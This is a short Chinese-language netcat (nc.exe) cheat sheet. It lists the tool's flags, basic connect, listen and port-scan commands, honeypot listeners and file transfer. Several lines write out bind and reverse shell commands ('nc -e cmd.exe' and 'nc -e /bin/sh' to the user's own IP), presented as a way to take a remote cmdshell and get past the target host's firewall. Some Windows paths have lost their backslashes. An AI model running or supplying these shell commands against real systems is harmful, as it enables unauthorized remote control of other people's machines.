瑞士軍刀：nc.exe

1、瑞士軍刀：nc.exe

參數(shù)說明： 

-h 查看幫助信息 

-d 后臺模式 

-e prog程序重定向，一但連接就執(zhí)行［危險］ 

-i secs延時的間隔 

-l 監(jiān)聽模式，用于入站連接 

-L 監(jiān)聽模式，連接天閉后仍然繼續(xù)監(jiān)聽，直到CTR+C 

-n IP地址，不能用域名 

-o film記錄16進(jìn)制的傳輸 

-p[空格]端口 本地端口號 

-r 隨機本地及遠(yuǎn)程端口 

-t 使用Telnet交互方式 

-u UDP模式 

-v 詳細(xì)輸出，用-vv將更詳細(xì) 

-w數(shù)字 timeout延時間隔 

-z 將輸入，輸出關(guān)掉（用于掃錨時） 

基本用法： 

nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80端口 

nc -l -p 80 開啟本機的TCP 80端口并監(jiān)聽 

nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024端口 

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354端口 

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell并反向連接192.168.0.2的5354端口 

高級用法： 

nc -L -p 80 作為蜜罐用1：開啟并不停地監(jiān)聽80端口，直到CTR+C為止 

nc -L -p 80 > c:\log.txt 作為蜜罐用2：開啟并不停地監(jiān)聽80端口，直到CTR+C,同時把結(jié)果輸出到c:\log.txt 

nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1：開啟并不停地監(jiān)聽80端口，直到CTR+C,并把c:\honeyport.txt中內(nèi)容送入管道中，亦可起到傳送文件作用 

type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2：開啟并不停地監(jiān)聽80端口，直到CTR+C,并把c:\honeyport.txt中內(nèi)容送入管道中,亦可起到傳送文件作用 

本機上用：nc -l -p 本機端口 

在對方主機上用：nc -e cmd.exe 本機IP -p 本機端口 *win2K

nc -e /bin/sh 本機IP -p 本機端口 *linux,unix 反向連接突破對方主機的防火墻 

本機上用：nc -d -l -p 本機端口 < 要傳送的文件路徑及名稱 

在對方主機上用：nc -vv 本機IP 本機端口 > 存放文件的路徑及名稱 傳送文件到對方主機 

備 注： 

| 管道命令 

< 或 > 重定向命令。“<”，例如：tlntadmn < test.txt 指把test.txt的內(nèi)容賦值給tlntadmn命令 

＠ 表示執(zhí)行＠后面的命令，但不會顯示出來（后臺執(zhí)行）；例：＠dir c:\winnt >> d:\log.txt 意思是：后臺執(zhí)行dir，并把結(jié)果存在d:\log.txt中 

>與>>的區(qū)別 　">"指：覆蓋；">>"指：保存到(添加到）。

如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執(zhí)行二次比較看：用>>的則是把二次的結(jié)果都保存了，而用：>則只有一次的結(jié)果，是因為第二次的結(jié)果把第一次的覆蓋了。